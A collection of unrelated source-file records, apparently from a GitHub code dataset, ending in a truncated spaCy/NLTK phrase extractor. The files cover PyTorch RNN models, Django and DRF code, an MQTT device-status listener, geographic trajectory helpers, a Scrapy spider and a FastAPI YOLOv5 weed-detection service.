models.ImageField()\n\n","repo_name":"roher1727/newcompa","sub_path":"usuario/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7971031698","text":"'''\nhttp://cs231n.stanford.edu/reports/2017/pdfs/903.pdf\nhttps://github.com/czanoci/cs231n_cris_jim\n'''\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import init\nimport torchvision.models as models\nfrom torch.nn.utils.rnn import pack_padded_sequence\nfrom torch.autograd import Variable\nimport sys\nfrom models.vgg16 import *\n# from vgg16 import *\n\nclass Sliceconv(nn.Module): \n def __init__(self,inputsize=512,hiddensize=512,outputsize=512):\n super(Sliceconv, self).__init__()\n self.conv=torch.nn.Conv1d(inputsize,outputsize,kernel_size=5,stride = 1 ,padding=2)\n \n # self.conv=nn.Sequential(\n # #torch.nn.Conv1d(inputsize,hiddensize,kernel_size=5,stride = 1 ,padding=2),\n # torch.nn.Conv1d(hiddensize,outputsize,kernel_size=5,stride = 1 ,padding=2)\n # )\n def forward(self, x):\n x=x.permute(1, 0)\n x=x.unsqueeze(0)\n x=self.conv(x)\n x=x.squeeze(0)\n x=x.permute(1, 0)\n return x\n\n#%%\nclass SliceRNN(nn.Module):\n def __init__(self,inputsize=512,hiddensize=64,layer = 4,rnntype='GRU'):\n super(SliceRNN, self).__init__()\n # self.conv1 = Sliceconv()\n self.type=rnntype\n # self.outputsize=outputsize\n self.layer = layer \n self.hiddensize=hiddensize\n \n if self.type=='GRU':\n self.RNN=nn.GRU(inputsize,self.hiddensize,layer,batch_first=True,bidirectional=True)\n elif self.type=='LSTM':\n self.RNN=nn.LSTM(inputsize,self.hiddensize,layer,batch_first=True,bidirectional=True)\n else:\n print(\"RNN type ERROR!!!!\")\n qwe\n # self.linear=nn.Linear(hiddensize*2,outputsize)\n def forward(self, x):\n # x = self.conv1(x)\n x=x.unsqueeze(0)\n if self.type=='GRU':\n output,hn=self.RNN(x)\n elif self.type=='LSTM':\n output,hn=self.RNN(x)\n \n output=torch.squeeze(output,0)\n # output=self.linear(output)\n return output\n \n#%%\nclass NeckRNN(nn.Module):\n def __init__(self,inputsize=224,hiddensize=256,outputsize=5,layer = 4,rnntype='GRU',FE=None):\n super(NeckRNN, self).__init__()\n if FE==None:\n self.cnn=VGG16_FE(inputsize=inputsize)\n else:\n self.cnn=FE\n self.rnn=SliceRNN(hiddensize=hiddensize,layer = layer,rnntype=rnntype)\n # self.linear=nn.Linear(512,outputsize)\n \n def forward(self, x):\n x=self.cnn(x)\n print(x.size())\n y=self.rnn(x)\n x=x+y\n # x=self.linear(F.relu(x))\n return x\n#%% \nclass DecoderBinaryRNN(nn.Module):\n def __init__(self, hidden_size, cnn_output_size, num_labels,vgg = None,mode = \"gru\"):\n \"\"\"Set the hyper-parameters and build the layers.\"\"\"\n super(DecoderBinaryRNN, self).__init__()\n \n self.mode = mode\n self.num_labels = num_labels\n self.SRNN = SliceRNN()\n # self.conv1 = Sliceconv()\n # self.NeckRNN = NeckRNN(FE=vgg)\n self.linear_img_to_lstm = nn.Linear(cnn_output_size, hidden_size)\n if self.mode == \"lstm\":\n self.lstm = nn.LSTM(1, hidden_size, 1, batch_first=True, bidirectional=True)\n self.linear_final = nn.Linear(hidden_size*2, 1)\n elif self.mode == \"gru\":\n self.gru = nn.GRU(1, hidden_size, 1, batch_first=True , bidirectional=True)\n self.linear_final = nn.Linear(hidden_size*2, 1)\n\n def forward(self, cnn_features):\n \n # cnn_features = self.conv1(cnn_features)\n rnn_features = self.SRNN(cnn_features)\n # rnn_features = self.NeckRNN(cnn_features)\n # print(rnn_features.size())\n h0 = torch.unsqueeze(self.linear_img_to_lstm(rnn_features), 0).to(\"cuda\")\n c0 = torch.autograd.Variable(torch.zeros(h0.size(0), h0.size(1), h0.size(2)), requires_grad = False).to(\"cuda\")\n zero_input = torch.autograd.Variable(torch.zeros(cnn_features.size(0), self.num_labels, 1), requires_grad = False).to(\"cuda\")\n\n if self.mode == \"lstm\":\n hiddens, _ = self.lstm(zero_input, (h0.repeat(2,1,1), c0.repeat(2,1,1)))\n elif self.mode == \"gru\":\n hiddens, _ = self.gru(zero_input, h0.repeat(2,1,1))\n\n unbound = torch.unbind(hiddens, 1)\n combined = [self.linear_final(elem) for elem in unbound]\n combined = torch.stack(combined, 1).squeeze(2)\n \n return combined\n \n#%%\n\nif __name__ == \"__main__\":\n hidden_size = 256\n cnn_output_size = 128\n num_labels = 5\n # birnn = SliceRNN().to(\"cuda\") \n birnn = DecoderBinaryRNN(hidden_size, cnn_output_size, num_labels,mode = \"gru\").to(\"cuda\") \n # birnn = NeckRNN().to(\"cuda\") \n in_p = torch.rand(2,512).to(\"cuda\") \n # in_p = torch.rand(2,1,224,224).to(\"cuda\") \n \n out = birnn(in_p)\n print(out.size() )\n \n # print(out.size())\n\n\n\n\n","repo_name":"yohschang/Deep_learning","sub_path":"multiclass_classification/models/Binary_model_rnn.py","file_name":"Binary_model_rnn.py","file_ext":"py","file_size_in_byte":4868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36122446686","text":"broker_address=\"2.0.0.2\" \n#\n# For a real world test with test.mosquitto.org (91.121.93.94) set the MQTT Broker IP on the Mirror Head to the same as below. Make sure you also \n# set the gateway correct so the Mirror Head can access the internet.\n# Send: mosquitto_pub -h 91.121.93.94 -t \"DPI/MH/global/input\" -m \"64 0 64 0 0 0 0 0 0 255 0 0 255 0 1\", this will move the mirror and set the LED to blue. \n# To regain ArtNet/Web/DMX controll set the last byte to 0:\n# mosquitto_pub -h 91.121.93.94 -t \"DPI/MH/global/input\" -m \"64 0 64 0 0 0 0 0 0 255 0 0 255 0 0\"\n# \n# ENABLE THIS FOR INERNET TEST:\n# broker_address=\"91.121.93.94\" \n\n\nimport paho.mqtt.client as mqtt \nimport struct\nco=0\n\ndef process_data(c,u,m):\n global co\n try:\n co+=1\n # telemetry status structure from the MH is in the form:\n # struct __attribute__((__packed__)) telemetry_ {\n # uint32_t axis_position[2]; // Target position in AXIS units\n # uint32_t dmx_position[2]; // Target DMX position \n # uint32_t tmc_step[2]; // Actual position of the motors in AXSIS units\n # uint8_t angles[2]; // selected PAN and TILT max. angle\n # }\n x=struct.unpack('IIIIIIBB',m.payload)\n print(m.topic,x) # simple output\n #print(co,x[0],\" \",x[4],\" \",x[1],\" \",x[5]) # use this for plotting \n except Exception as err:\n print(\"error\", err)\n\n\nclient = mqtt.Client(\"myuniq-id\") \nclient.on_message = process_data\nclient.connect(broker_address) \nclient.subscribe(\"DPI/MH/#\")\nclient.loop_forever()\n","repo_name":"DynamicProjectionInstitute/MirrorHead-examples","sub_path":"mqtt-status-display.py","file_name":"mqtt-status-display.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36861193143","text":"import math\nimport os\nfrom pathlib import Path\n\nimport numpy as np\n\n\ndef get_path_length(lat1, lng1, lat2, lng2):\n # '''calculates the distance between two lat, long coordinate pairs'''\n r = 6371000 # radius of earth in m\n lat1rads = math.radians(lat1)\n lat2rads = math.radians(lat2)\n delta_lat = math.radians((lat2 - lat1))\n delta_lng = math.radians((lng2 - lng1))\n a = math.sin(delta_lat / 2) * math.sin(delta_lat / 2) + math.cos(\n lat1rads) * math.cos(lat2rads) * math.sin(delta_lng / 2) * math.sin(\n delta_lng / 2)\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = r * c\n return d\n\n\ndef get_destination_lat_long(lat, lng, azimuth, distance):\n # '''returns the lat an long of destination point\n # given the start lat, long, aziuth, and distance'''\n r = 6378.1 # Radius of the Earth in km\n brng = math.radians(azimuth) # Bearing is degrees converted to radians.\n d = distance / 1000 # Distance m converted to km\n lat1 = math.radians(lat) # Current dd lat point converted to radians\n lon1 = math.radians(lng) # Current dd long point converted to radians\n lat2 = math.asin(\n math.sin(lat1) * math.cos(d / r) + math.cos(lat1) * math.sin(\n d / r) * math.cos(brng))\n lon2 = lon1 + math.atan2(math.sin(brng) * math.sin(d / r) * math.cos(lat1),\n math.cos(d / r) - math.sin(lat1) * math.sin(lat2))\n # convert back to degrees\n lat2 = math.degrees(lat2)\n lon2 = math.degrees(lon2)\n return [lat2, lon2]\n\n\ndef calculate_bearing(lat1, lng1, lat2, lng2):\n # '''calculates the azimuth in degrees from start point to end point'''\n start_lat = math.radians(lat1)\n start_long = math.radians(lng1)\n end_lat = math.radians(lat2)\n end_long = math.radians(lng2)\n d_long = end_long - start_long\n d_phi = math.log(math.tan(end_lat / 2.0 + math.pi / 4.0) / math.tan(\n start_lat / 2.0 + math.pi / 4.0))\n if abs(d_long) > math.pi:\n if d_long > 0.0:\n d_long = -(2.0 * math.pi - d_long)\n else:\n d_long = (2.0 * math.pi + d_long)\n bearing = (math.degrees(math.atan2(d_long, d_phi)) + 360.0) % 360.0\n return bearing\n\n\ndef generate_points(interval, azimuth, lat1, lng1, lat2, lng2):\n # '''returns every coordinate pair inbetween two coordinate\n # pairs given the desired interval'''\n\n d = get_path_length(lat1, lng1, lat2, lng2)\n remainder, dist = math.modf((d / interval))\n counter = float(interval)\n coords = [[lat1, lng1]]\n for distance in range(0, int(dist)):\n coord = get_destination_lat_long(lat1, lng1, azimuth, counter)\n counter = counter + float(interval)\n coords.append(coord)\n coords.append([lat2, lng2])\n return coords\n\n\ndef generate_linear_trajectories(path, array: np.ndarray, interval: float,\n map_number: int, senario:int):\n\n for i, points in enumerate(array):\n lat1 = points[0]\n lng1 = points[1]\n lat2 = points[2]\n lng2 = points[3]\n azimuth = calculate_bearing(lat1, lng1, lat2, lng2)\n coords = generate_points(interval, azimuth, lat1, lng1, lat2, lng2)\n # np.savetxt(path / f'+1}.txt', coords)\n if not os.path.exists(f'{path}/senario_{senario}'):\n os.mkdir(f'{path}/senario_{senario}')\n np.savetxt(f'{path}/senario_{senario}/map{map_number}_{i+1}.txt', coords)\n print('Траектории сгенерированы и сохраены успешно в папку: ', path)\n\n","repo_name":"amjad-hub/test","sub_path":"points.py","file_name":"points.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11497734680","text":"from rest_framework_json_api import serializers\n\nfrom inmobiliaria.serializers import InmobiliariaSerializer\nfrom inmueble.constants import LISTA_NOMBRE_NO_PERMITIDOS\nfrom inmueble.models import Casa, Servicio\n\n\nclass ServicioSerializer(serializers.ModelSerializer):\n class Meta:\n model = Servicio\n fields = ('nombre', 'fecha_creacion', 'usuario')\n\n included_serializers = {\n 'usuario': 'usuario.serializers.UsuarioSerializer',\n }\n\n def validate_nombre(self, nombre):\n nombre = nombre.lower()\n if Servicio.objects.activos().filter(nombre=nombre).exists():\n raise serializers.ValidationError('El servicio {} ya existe'.format(nombre))\n\n if nombre.startswith(LISTA_NOMBRE_NO_PERMITIDOS):\n raise serializers.ValidationError('El nombre indicado comienza con un valor no permitido')\n\n return nombre\n\n\nclass CasaSerializer(serializers.ModelSerializer):\n class Meta:\n model = Casa\n fields = serializers.ALL_FIELDS\n\n included_serializers = {\n 'inmobiliaria': InmobiliariaSerializer,\n 'servicios': ServicioSerializer,\n }\n","repo_name":"wbivanco/inmobiliarias","sub_path":"project/apps/inmueble/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44952643286","text":"import datetime\nimport json\nimport argparse\nimport pandas as pd\nimport re\nimport dateutil\nfrom dateutil.parser import isoparse\nfrom dateutil.tz import UTC\n\n\n#-i is the input file\n#-o is the output file\nparser = argparse.ArgumentParser()\nparser.add_argument('-i','--input_file',help='Input file')\nparser.add_argument('-o','--output_file',help='Output file')\nargs = parser.parse_args()\n\ndef main():\n file = open_and_load(args.input_file)\n file2 = title_check(file)\n file = change_title(file2)\n file2 = check_author(file)\n file = check_count_convert(file2)\n file2 = ISO_check_UTC_convert(file)\n file = check_tags(file2)\n write_to_file(file)\n\n\n#open and load the File into a pyton array\n#this also removes invalid JSON objects that are missing the last } 5\ndef open_and_load(input):\n raw_data = []\n f = open(input,'r+')\n for line in f:\n try: \n json_line = json.loads(line)\n raw_data.append(json_line)\n\n except:\n continue\n f.close()\n return raw_data\n#lets remove all lines that dont have a title or title_text 1\ndef title_check(raw_data):\n title_only = []\n for i in range(0,len(raw_data)):\n if ('title' in raw_data[i].keys() or 'title_text' in raw_data[i].keys()):\n title_only.append(raw_data[i])\n return title_only\n#change all title_text to title 2\ndef change_title(title_only):\n for i in range(0,len(title_only)):\n \n if ('title_text' in title_only[i].keys()):\n print('')\n title_only[i]['title'] = title_only[i]['title_text']\n del title_only[i]['title_text']\n return title_only\n#remove all objects where the author field is empty, null, or N/A 6\ndef check_author(title_only):\n data = []\n for i in range(0,len(title_only)):\n \n if (title_only[i]['author'] != 'N/A' and title_only[i]['author'] != None and title_only[i]['author'] != 'n/a'):\n data.append(title_only[i])\n return data\n#check if str, int, float then convert to int 7, 8\ndef check_count_convert(data):\n swag = []\n for i in range(0,len(data)):\n if('total_count' not in data[i].keys()):\n swag.append(data[i])\n continue\n if(type(data[i]['total_count']) == int or type(data[i]['total_count']) == str or type(data[i]['total_count']) == float):\n \n try:\n data[i]['total_count'] = int(float(data[i]['total_count']))\n swag.append(data[i])\n except:\n continue\n return swag\n#check if date is ISO standard 4\ndef ISO_check_UTC_convert(swag):\n data = []\n for i in range(0,len(swag)):\n try:\n dateutil.parser.isoparse(swag[i]['createdAt'])\n data.append(swag[i])\n except:\n continue\n #convert to UTC 3\n for i in range(0,len(data)):\n dt = isoparse(data[i]['createdAt'])\n data[i]['createdAt'] = str(dt.astimezone(UTC))\n return data\n#9 tags\ndef check_tags(data):\n for i in range(0,len(data)):\n if('tags' not in data[i].keys()):\n continue\n\n all_tags = []\n for tag in data[i]['tags']:\n all_tags.extend((tag.split(' ')))\n data[i]['tags'] = all_tags\n return data\n#write to output file 10\ndef write_to_file(data):\n with open(args.output_file,'w') as f:\n json.dump(data, f,indent=4)\n\nif __name__ == '__main__':\n main()\n","repo_name":"knowo1234/Data-Science-Course-McGill","sub_path":"COMP_598/assign_5/src/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16963187827","text":"#utilizando variáveis dentro do laço\nfor p in range(1,6):\n peso = int(input(f\"DIGITE O SEU PESO {p}º>> \"))\n if p == 1:\n maior = peso\n menor = peso\n else:\n if peso>maior:\n maior = peso\n if peso max(defined_levels): # Case 3.1\n completeness_level = max(defined_levels)\n elif specified_level < min(defined_levels): # Case 3.2\n completeness_level = min(defined_levels)\n else: # Case 3.3\n # Find the maximum defined level less than specified_level\n lesser_defined_level_dist = sys.maxsize\n for level in defined_levels:\n if level <= specified_level and lesser_defined_level_dist > (specified_level - level):\n completeness_level = level\n lesser_defined_level_dist = lesser_defined_level_dist - level\n logging.info(\"Specified level ({}) not found in defined levels. Setting level to {}\".format(str(CompletenessLevel(specified_level)), str(completeness_level)))\n else: # Case 4\n completeness_level = specified_level\n logging.info(\"Setting the completeness level to {}\".format(str(CompletenessLevel(completeness_level))))\n\n return completeness_level","repo_name":"ANISH-GOTTAPU/sonic-mgmt-anish","sub_path":"tests/common/plugins/test_completeness/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3994837877","text":"from functools import reduce\nfrom itertools import zip_longest as zlo\n\ndef solve(a,b):\n\n primes = []\n total = 0\n \n for i in range(a,b):\n if is_prime(i): primes.append(i)\n for idx,prime in enumerate(primes):\n for p1,p2 in zlo([prime], primes[idx:], fillvalue=prime):\n if check([p1,p2]):\n total += 1\n \n return total \n \n \ncheck = lambda n: is_prime(reduce(lambda x,y: x+y, map(int, str(n[0]*n[1])))) \n\n\nis_prime = lambda n: False if n<2\\\n else n==2\\\n or all(n%i!=0 for i in range(2,int(n**0.5)+1))\n","repo_name":"Orange9000/Codewars","sub_path":"Solutions/6kyu/6kyu_prime_reversion.py","file_name":"6kyu_prime_reversion.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"81"} +{"seq_id":"26314233071","text":"import scrapy\nimport pickle\nimport os\nimport ast\nfrom urllib import parse\nfrom scrapy.selector import Selector\n\nclass HeilongjiangSpider(scrapy.Spider):\n name = \"Heilongjiang\"\n if not os.path.exists('../../data/HTML_pk/%s' % name):\n os.makedirs('../../data/HTML_pk/%s' % name)\n if not os.path.exists('../../data/text/%s' % name):\n os.makedirs('../../data/text/%s' % name)\n def start_requests(self):\n total_page = 6389\n url_base = 'http://gkml.dbw.cn/gkml/web/data/ztfl.ashx?s=20&p={0}&c=1&k=&t='\n for i in range(total_page):\n yield scrapy.Request(url=url_base.format(str(i+1)), callback=self.parse)\n\n def parse(self,response):\n detail_page_links = []\n detail_url_base = 'http://gkml.dbw.cn/gkml/web/data/detail.ashx?t=2&d={0}'\n for piece_dict in ast.literal_eval(response.text[25:-29])['data']:\n UID = piece_dict['ID']\n piece_dict['UID'] = UID\n piece_dict['date'] = piece_dict['time']\n detail_page_links.append(detail_url_base.format(UID))\n piece_dict['crawl state'] = 'half'\n yield piece_dict\n yield from response.follow_all(detail_page_links, callback = self.parse_content)\n\n def parse_content(self, response):\n UID = response.url.split('=')[-1]\n with open('../../data/HTML_pk/%s/%s.pkl' % (self.name,UID), 'wb') as f:\n pickle.dump(response.text,f)\n paragraph_list = []\n new_text = parse.unquote_plus(response.text[7:-6])\n for escape_text in Selector(text=new_text).css('div.zwnr *::text').getall():\n paragraph = escape_text.replace(\"%\",\"\\\\\").encode(\"utf-8\").decode(\"unicode_escape\") \n paragraph_list.append(paragraph)\n with open('../../data/text/%s/%s.txt' % (self.name,UID), 'w') as f:\n f.write('\\n'.join(paragraph_list))\n return {\n 'UID': UID,\n 'mainText': paragraph_list,\n 'crawl state':'full',\n }\n","repo_name":"chairmenfrog/Policy_crawler","sub_path":"src/crawl_data/crawl_data/spiders/HeilongjiangSpider.py","file_name":"HeilongjiangSpider.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"1864363166","text":"from __future__ import absolute_import\n\nimport te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom topi import generic\nfrom topi.cce import util\n\n# shape limit for aicore equals 2**31\nSHAPE_SIZE_LIMIT = 2147483648\n\n# pylint: disable=locally-disabled,too-many-arguments,unused-argument\n@fusion_manager.register(\"reduce_all_d\")\ndef reduce_all_d_compute(input_data, output_data, axes,\n keepdims, kernel_name=\"reduce_all_d\"):\n \"\"\" TVM calculation process, used for fusion operation\n\n Parameters\n ----------\n input_data: TVM tensor\n the placeholder of input data\n output_data: dict\n shape and dtype of output, should be same shape and type as input\n axes: int, list ,tuple or None.\n the first axes to reduce, may be negative to index from the end\n (e.g., -1 for the last axes).\n axes may be int or list(e.g. [1,2])\n keepdims : bool or None .\n if true, retains reduced dimensions with length 1,\n default value is None\n kernel_name: str\n cce kernel name, default value is \"all_cce\"\n\n Returns\n -------\n result: TVM tensor.\n \"\"\"\n shape = te.lang.cce.util.shape_to_list(input_data.shape)\n shape_len = len(shape)\n if not axes:\n axes = range(shape_len)\n if hasattr(axes, 'index'):\n axes = list(axes)\n\n dtype = input_data.dtype\n data_fp16 = te.lang.cce.cast_to(input_data, \"float16\")\n data_abs = te.lang.cce.vabs(data_fp16)\n result_tmp = te.lang.cce.reduce_min(data_abs, axes, keepdims=False)\n result = te.lang.cce.cast_to(result_tmp, dtype, True)\n\n return result\n\n@util.check_input_type(dict, dict, (int, list, tuple, type(None)),\n (bool, type(None)), str)\ndef reduce_all_d(input_data, output_data, axes,\n keepdims=None, kernel_name=\"reduce_all_d\"):\n \"\"\"\n Reduce a tensor on a certain axes based on min\n\n Parameters:\n ----------\n input_data: dict\n shape and dtype of input_data, only support int8\n output_data: dict\n source data type, only support int8\n axes : int, list ,tuple or None.\n the first axes to reduce, may be negative to index from the end\n (e.g., -1 for the last axes).\n axes may be int or list(e.g. [1,2])\n keepdims : bool or None .\n if true, retains reduced dimensions with length 1,\n default value is None\n kernel_name : str\n cce kernel name, default value is \"cce_all\"\n\n Returns\n -------\n None\n \"\"\"\n input_shape = input_data.get(\"shape\")\n input_dtype = input_data.get(\"dtype\").lower()\n if input_dtype == \"bool\":\n input_dtype = \"int8\"\n util.check_kernel_name(kernel_name)\n util.check_shape_rule(input_shape)\n util.check_shape_size(input_shape, SHAPE_SIZE_LIMIT)\n util.check_dtype_rule(input_dtype, (\"int8\"))\n\n shape_len = len(input_shape)\n if not axes:\n axes = range(shape_len)\n\n if hasattr(axes, 'index'):\n axes = list(axes)\n axes = util.axis_check(shape_len, axes)\n\n if not isinstance(axes, int):\n for i in axes:\n if i >= len(input_shape):\n raise RuntimeError(\"axes should be less than dimension\")\n else:\n if axes >= len(input_shape):\n raise RuntimeError(\"axes should be less than dimension\")\n\n # 5HD Special param for 5hd schedule\n is_5hdc = util.check_and_init_5hdc_reduce_support(input_data, axes, kernel_name)\n if not is_5hdc:\n input_shape, axes = util.shape_refine(list(input_shape), axes)\n input_shape, axes = util.simplify_axis_shape(input_shape, axes)\n\n data_input = tvm.placeholder(input_shape, name=\"data_input_\" + kernel_name,\n dtype=input_dtype)\n result = reduce_all_d_compute(data_input, output_data, axes,\n keepdims, kernel_name)\n\n with tvm.target.cce():\n sch = generic.auto_schedule(result)\n\n config = {\"print_ir\": False,\n \"name\": kernel_name,\n \"tensor_list\": [data_input, result]}\n te.lang.cce.cce_build_code(sch, config)\n","repo_name":"jizhuoran/caffe-huawei-atlas-convertor","sub_path":"convertor/huawei/impl/reduce_all_d.py","file_name":"reduce_all_d.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"70554061705","text":"from django.conf.urls import patterns, include, url\nfrom django.core.urlresolvers import reverse_lazy\nfrom money import views as views_money\n\nurlpatterns = patterns('',\n\n #auth\n url(r'^$', 'django.contrib.auth.views.login', name='user_login'),\n url(r'^login$', 'django.contrib.auth.views.login', name='user_login'),\n url(r'^logout$', 'django.contrib.auth.views.logout', {'next_page': reverse_lazy('user_login')} ,name='user_logout'),\n\n #app\n url (r'^dashboard$',views_money.DashBoard.as_view(), name='dashboard'),\n url(r'^entries$', views_money.EntryList.as_view(), name='entry_list'),\n url(r'^entries/create$', views_money.EntryCreate.as_view(), name='entry_create'),\n\n url(r'^banks/$', views_money.BankList.as_view(), name='bank_list'),\n url(r'^banks/edit/(?P\\d+)$', views_money.BankList.as_view(), name='bank_edit'),\n url(r'^banks/delete/(?P\\d+)$', views_money.BankDelete.as_view(), name='bank_delete'),\n\n url(r'^accounts/$', views_money.AccountList.as_view(), name='account_list'),\n url(r'^accounts/edit/(?P\\d+)$', views_money.AccountList.as_view(), name='account_edit'),\n\n url(r'^people/$', views_money.PersonList.as_view(), name='person_list'),\n url(r'^people/edit/(?P\\d+)$', views_money.PersonList.as_view(), name='person_edit'),\n\n)\n","repo_name":"gutorocher/django-cashflow","sub_path":"money/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"6476664160","text":"from fastapi import FastAPI, File, UploadFile\nfrom fastapi.param_functions import Path\nfrom segmentation import get_yolov5, get_image_from_bytes, get_pest_yolov5,get_image_from_bytes_array\nfrom starlette.responses import Response\nimport io\nfrom PIL import Image\nimport json\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.middleware.cors import CORSMiddleware\nimport os\nfrom fastapi.responses import FileResponse\nimport random\n\n\nmodel = get_yolov5()\npest_model = get_pest_yolov5()\nIMAGEDIR = \"fastapi-images/\"\nBATCHDIR = \"\"\n\nmylist = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','p','q','r','s','t','u','v','w','x','y','z']\n\napp = FastAPI(\n title=\"Object Detection Api\",\n description=\"\"\"Obtain object value out of image\n and return image and json result\"\"\",\n version=\"0.0.1\",\n)\n\norigins = [\n \"http://localhost\",\n \"http://localhost:8000\",\n \"http://localhost:3000\",\n \"*\"\n ]\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\napp.mount('/static', StaticFiles(directory='static'), name='static')\n\n\n@app.get('/notify/v1/health')\ndef get_health():\n \"\"\"\n Usage on K8S\n readinessProbe:\n httpGet:\n path: /notify/v1/health\n port: 80\n livenessProbe:\n httpGet:\n path: /notify/v1/health\n port: 80\n :return:\n dict(msg='OK')\n \"\"\"\n return dict(msg='OK')\n\n\n@app.post(\"/object-to-json\")\nasync def detect_weed_return_json_result(file: bytes = File(...)):\n input_image = get_image_from_bytes(file)\n results = model(input_image)\n detect_res = results.pandas().xyxy[0].to_json(orient=\"records\")\n detect_res = json.loads(detect_res)\n return {\"result\": detect_res}\n\n\n@app.post(\"/object-to-img\")\nasync def detect_return_base64_img(file:bytes = File(...) ):\n input_image = get_image_from_bytes(file)\n results = model(input_image)\n results.render() # updates results.imgs with boxes and labels\n for img in results.imgs:\n bytes_io = io.BytesIO()\n img_base64 = Image.fromarray(img)\n img_base64.save(bytes_io, format=\"jpeg\")\n rand = random.choice(mylist)\n \n img_base64.save(IMAGEDIR+rand+'.jpeg')\n path = f\"{IMAGEDIR}{rand}\"\n return dict(path=rand)\n \n@app.post(\"/object-to-img-pest\")\nasync def detect_return_base64_img(file:bytes = File(...) ):\n input_image = get_image_from_bytes(file)\n results = pest_model(input_image)\n results.render() # updates results.imgs with boxes and labels\n for img in results.imgs:\n bytes_io = io.BytesIO()\n img_base64 = Image.fromarray(img)\n img_base64.save(bytes_io, format=\"jpeg\")\n\n rand = random.choice(mylist)\n img_base64.save(IMAGEDIR+rand+'.jpeg')\n path = f\"{IMAGEDIR}{rand}\"\n return dict(path=rand)\n\n@app.post(\"/object-to-json-pest\")\nasync def detect_pest_return_json_result(file: bytes = File(...)):\n input_image = get_image_from_bytes(file)\n results = pest_model(input_image)\n detect_res = results.pandas().xyxy[0].to_json(orient=\"records\")\n detect_res = json.loads(detect_res)\n return {\"result\": detect_res}\n\n\n@app.get(\"/img/{image_filename}\")\ndef img(image_filename:str):\n return FileResponse(\"fastapi-images/\"+image_filename+\".jpeg\")\n\n@app.get(\"/products/insectisides\")\ndef product_list():\n file = open('data.json')\n json_data = json.load(file)\n file.close()\n return json_data\n\n@app.get(\"/products/herbisides\")\ndef product_list():\n file = open('herbiside.json')\n json_data = json.load(file)\n file.close()\n return json_data\n\n\n\n@app.post(\"/batch\")\ndef detect_batch(path: str):\n BATCHDIR= path\n model = get_yolov5()\n # Model\n imgs =[]\n # Images\n #imgs = [IMAGEDIR + f for f in IMAGEDIR] # batch of images\n for filename in os.listdir(BATCHDIR):\n f = os.path.join(BATCHDIR, filename)\n # checking if it is a file\n if os.path.isfile(f):\n im=Image.open(f)\n imgs.append(f)\n print(imgs)\n # Inference\n results = model(imgs)\n results.print() \n res = results.pandas().xyxy[0].to_json(orient=\"records\")\n res1 = results.pandas().xyxy[1].to_json(orient=\"records\")\n final = res+res1\n \n return {\"msg\":final}","repo_name":"Pineapple-1/weed-detection","sub_path":"yolov5-fastapi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39040052880","text":"import spacy\nimport io\nimport sys, nltk, os\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.corpus import wordnet\nfrom collections import Counter\nfrom pprint import pprint\nfrom nltk.stem import PorterStemmer\nfrom nltk.parse.stanford import StanfordDependencyParser\n\n\n\nnlp = spacy.load('en')\n\nos.environ['JAVAHOME']=\"/Library/Java/JavaVirtualMachines/jdk1.8.0_121.jdk/Contents/Home\"\nstan_dep_parser = StanfordDependencyParser(\"jars/stanford-parser.jar\", \"jars/stanford-parser-3.4.1-models.jar\")\n\nport_stemmer = PorterStemmer()\nphrase_list = ['nn','det','num','number','amod','advmod','poss','dep','conj','cc']\n# extract easy information templates first\n# amount = [ent for ent in doc if (ent.ent_type_ == \"MONEY\")]\n# date = [ent for ent in doc if (ent.ent_type_ == \"DATE\" or ent.ent_type_ == \"TIME\")]\n\ndef get_noun_phrases(word,sentence):\n # print(\"reached word is \",word)\n doc = nlp(sentence)\n index = 0\n nounIndice = 0\n for token in doc:\n if token.text == word and token.pos_ == 'NOUN':\n nounIndice = index\n index = index + 1\n # for node in [doc[nounIndice].left_edge : doc[nounIndice].right_edge]:\n if doc[nounIndice].left_edge.tag_ in ['IN','TO']:\n left_index = doc[nounIndice].left_edge.i+1\n else:\n left_index = doc[nounIndice].left_edge.i\n span = doc[left_index : doc[nounIndice].right_edge.i+1]\n span.merge()\n\n result = word\n for token in doc:\n if word in token.text:\n # print(token.text,\"-----------------------------\")\n result = token.text\n for t in doc.noun_chunks:\n # print(t,\"+++++++++++++++++++++++++++++++++++\")\n if result in t.text:\n result = t.text\n\n # print(\"result is *******\",result)\n # check_tokens = word_tokenize(result)\n return result\n\ndef get_full_word(word,parsetree):\n full_word = \"\"\n for triple 